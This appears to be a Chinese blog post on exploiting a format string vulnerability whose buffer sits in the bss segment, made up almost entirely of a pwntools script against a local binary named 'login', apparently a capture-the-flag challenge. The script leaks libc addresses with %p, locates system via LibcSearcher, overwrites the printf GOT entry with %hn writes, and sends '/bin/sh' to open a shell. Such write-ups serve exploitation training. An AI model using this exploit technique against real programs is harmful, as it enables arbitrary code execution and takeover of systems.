bss上的格式化字符串漏洞

http://www.starssgo.top/2019/12/06/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%9C%A8bss%E6%AE%B5%E7%9A%84%E5%A4%84%E7%90%86/

 

from pwn import *

from LibcSearcher import *

io = process('./login')
elf = ELF('./login')

# gdb.attach(io,'b *0x080485AA')

def change(n,k):
    payload = '%'+str(n)+'c%'+str(k)+'$hn'
    io.sendlineafter('Try again!\n',payload)

io.sendlineafter('your name: \n','admin')
io.sendlineafter('password: \n','AAAA%15$pBBBB%6$p')

io.recvuntil('AAAA')
__libc_start_main = int(io.recv(10),16) - 247
libc = LibcSearcher('__libc_start_main',__libc_start_main)
offset = __libc_start_main - libc.dump('__libc_start_main')
success(hex(offset))
system = offset + libc.dump('system')
success(hex(system))

io.recvuntil('BBBB')
p = int(io.recv(10),16)

change(int(hex(p)[6:10],16)-12,6)
change(int('b014',16),10)
change(int(hex(p)[6:10],16)+4,6)
change(int('b016',16),10)
addr1=int(hex(system)[6:10],16)
addr2=int(hex(system)[2:6],16)
payload = '%'+str(addr1)+'c%7$hn'+'%'+str(addr2-addr1)+'c%11$hn'
io.sendlineafter('Try again!\n',payload)
io.sendlineafter('Try again!\n','/bin/sh\x00')

io.interactive()
# 6 7 10 11 15
#printf_got:0x0804b014

 

上一篇:libc.so.6: cannot open shared object file


下一篇:linux hook相关代码